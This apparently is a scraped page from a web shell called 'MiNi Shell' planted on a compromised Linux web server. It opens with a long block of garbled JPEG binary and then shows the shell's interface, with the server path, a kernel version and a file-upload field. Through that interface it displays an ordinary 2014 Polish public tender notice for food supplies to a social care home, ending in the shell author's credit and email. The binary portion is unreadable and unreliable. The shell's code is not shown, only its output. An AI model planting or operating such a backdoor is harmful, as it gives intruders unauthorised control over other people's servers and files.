JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141124/243487-N-2014.html

<p class="kh_header"><b>Bolechowice: Dostawy artykułów spożywczych,przetworów owocowych, warzywnych i mrożonek</b><br>
<b>Numer ogłoszenia: 243487 - 2014; data zamieszczenia: 24.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Więckowice, ul. Słoneczna 3, 32-082 Bolechowice, woj. małopolskie, tel. 12 2851603, faks 12 2852010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpswieckowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych,przetworów owocowych, warzywnych i mrożonek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Artykuły spożywcze sypkie, przetwory owocowe i warzywne, mrożonki.
Zamówienie podzielone na trzy części.
Rodzaje i ilości wyszczególnione w opisie poszczególnych części..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy-spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy-spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy-spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy-spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy-spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przedłużenie terminu obowiązywania, zwiększenie zakresu i wartości</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswieckowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Więckowice, ul. Słoneczna 3, 32-082 Bolechowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2014 godzina 10:40, miejsce: Dom Pomocy Społecznej, Więckowice, ul. Słoneczna 3, 32-082 Bolechowice,
pokój Działu Administracyjno-Gospodarczego w pawilonie D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Andruty-wafle cukrzycowe op. do 110g                           	kg	65
2	Budyń bez cukru  śmietankowy op.do 1 kg                 	kg	80
3	Budyń bez cukru  czekoladowy op. do 1 kg	                kg	75
4	Bulion drobiowy Winiary op. do 2 kg	                                kg	5
5	Chrupki krakowskie a 350 g	                                        szt 	190
6	Ciastka deserowe	                                                        kg	60
7	Ciastka Grześki w czekoladzie a 39 g.	                        kg	25
8	Ciastka herbatniki szkolne	                                        kg	145
9	Ciastka krakersy op. 180 g	                                        kg	5
10	Cukier a 1 kg	                                                        kg	2400
11	Cukier puder a 0,5 kg	                                                kg	110
12	Cukier waniliowy op. do 1 kg	                                        kg	7
13	Cukierki w czekoladzie - mieszanka krakowska              	kg	15
14	Cynamon op. do 100g	                                                kg	1,5
15	Czekolada dla diabetyków a 100 g	                                kg	10
16	Czosnek granulowany op. do 1 kg	                                kg	13
17	Drożdże piekarskie a 100 g	                                        kg	9
18	Galaretka owocowa op. do 1 kg	                                kg	200
19	Herbata ekspres. owoc. Vitax op. po 20 szt.	                op.	265
20	Herbata liściasta Madras op.do 1 kg                          	kg	120
21	Kakao Wawel op do 0,5 kg	                                        kg	14
22	Kasza jęczmienna op. do 1 kg                                   	kg	120
23	Kasza manna op. do 1 kg	                                        kg	115
24	Kawa zbożowa op. do 1 kg	                                        kg	190
25	Ketchup Roleski op. do 0,5 kg                                  	kg	145
26	Kisiel bez cukru op. do 1 kg	                                        kg	120
27	Kleik ryżowy błyskawiczny a 200 g	                                kg	3
28	Kminek	                                                                kg	1,2     
29	Konserwa rybna śledź w pomidorach op. do 200 g	        kg	60
30	Konserwa rybna śledź w oleju op. do 200 g	                kg	60
31	Kwasek cytrynowy op. do 1 kg	                                kg	14
32	Liście laurowe 	                                                        kg	1,5
33	Majeranek                                                            	kg	1,8
34	Majonez Roleski op. do 1 kg	                                        kg	320
35	Makaron drobny 4-ro jajeczny op. do 1 kg                  	kg	340
36	Makaron nitki 4-ro jajeczny op. do 1 kg	                        kg	145
37	Makaron różny 4-ro jajeczny op. do 1 kg                          kg	400
38	Makrela wędzona	kg	205
39	Mąka pszenna tortowa op. do 1 kg typ 450	                kg	2100
40	Mąka ziemniaczana op. do 1 kg	                                kg	110
41	Miód naturalny wielokwiatowy op. do 400g	                kg	35
42	Musztarda kremowa Roleski op. do 0,5 kg                         kg	45
43	Ocet 10 % op. do 0,5 l	                                                  l	35
44	Olej Kujawski op. do 1 l	                                                  l	400
45	Paluszki słone Lajkonik op do300 g	                                 kg 	150
46	Pieprz czarny mielony op. do 1 kg	                                 kg	13
47	Płatki kukurydziane
Bez dodatków op.  do 1 kg                                                      kg   172
Corn                                                                                                             48	Płatki owsiane op. do 1 kg	                                         kg	90
49	Proszek do pieczenia op. do 50 g	                                 kg	1,5
50	Przyprawa do drobiu Kamis op. do 1 kg	                         kg	4
51	Przyprawa do mięsa Kamis op. do 1 kg	                         kg	1,5
52	Przyprawa do potraw Kucharekop. do 1 kg	                 kg	75
53	Przyprawa w płynie do zup Winiary a 1 l	                         l      215
54	Rodzynki op. do 1 kg	                                                 kg	36
55	Ryż op. do 1 kg	                                                         kg	350
56	Sól kuchenna jodowana op. do 1 kg	                                 kg	630
57	Śledzie solone Matjas op. do 5 kg po odcieku 4 kg	         kg	200
58	Śmietanka śnieżka op. do 60 g	                                 kg	20
59	Śliwki suszone bez pestek op do 250g	                         kg	6
60	Wiórka kokosowe op. do 100 g	                                 kg	20
61	Ziele angielskie op. do 1 kg	                                         kg	3
62	Żelatyna spożywcza op. do 1 kg	                                 kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy przetworów owocowych i warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Żurek op. do 0,5 l	                                                        l     155
2	Barszcz czerwony koncentrat Krakus op do 0,5 l         	l	85
3	Brzoskwinie w syropie a 850g	                                      szt	25
4	Chrzan tarty Polonaise op. do 250 g                              kg	120
5	Dżem niskosłodzony op. do 400 g                                  kg        385
6	Groszek konserwowy op. do 400 g                                 kg       130
7	Koncentrat pomidorowy 30% Pudliszki op. do 1 kg            kg       240
8	Kukurydza konserwowa a 400 g.	                              kg       145
9	Marmolada op. do 1 kg                                                kg          6
10	Papryka konserwowa czerwona 
op do 1 l.	                                                                       kg	255
11	Pieczarki marynowane op do 1 l	                               kg	130
12	Sałatka szwedzka op do 1 l.	                                       kg	255
13	Sałatka z czerwonej kapusty op do 1 l.	                       kg	205
14	Sok 100 % TYMBARK op. do 250 ml. różne smaki	        l	200
15	Sok 100 % TYMBARK czarna porzeczka  a 1 l.	                l	200
16	Sok 100 % TYMBARK pomarańcz  a 1 l	                        l	200
17	Sok 100 % TYMBARK jabłkowy  a 1 l	                                l	200
18	Sok 100 % TYMBARK wieloowocowy  a 1 l	                        l	350
19	Sok syrop op. do 0,5 l. malinowy	                                l	40
20	Powidła śliwkowe op. Do 0,9 kg	                               kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Borówki opak. do 2,5 kg                                                 	kg	70
2	Brukselka mrożona op do 2,5 kg	                                        kg	90
3	Fasola szparagowa mrożona żółta op. do2,5 kg	                        kg	130
4	Fasola szparagowa mrożona zielona op. do2,5 kg	                kg	155
5	Mintaj mrożony filet op. do 10 kg SHP                                      kg      200
6	Morszczuk mrożony op. do 10 kg SHP                                      kg	500
7	Groszek zielony mrożony op. do 2,5 kg	                                kg	90
8	Kalafior mrożony op. do 2,5 kg	                                   kg	  230       
9	Lody wielosmakowe op. do 150 g	                                         l      95
10	Mieszanka kompotowa mrożona 5-cio składnikowa op. do 10 kg	kg	2000
11	Szpinak mrożony mielonyop. do 2,5 kg	                                kg	240
12	Śl Śliwy mroż. bez pestek op. do 2,5 kg	                                kg	240
13	Truskawki mrożone op. do 2,5 kg	                                        kg	315
14	Marchew z groszkiem op. do 2,5 kg 	                                        kg	300
15	Brokuły op. do 2,5 kg	                                                        kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com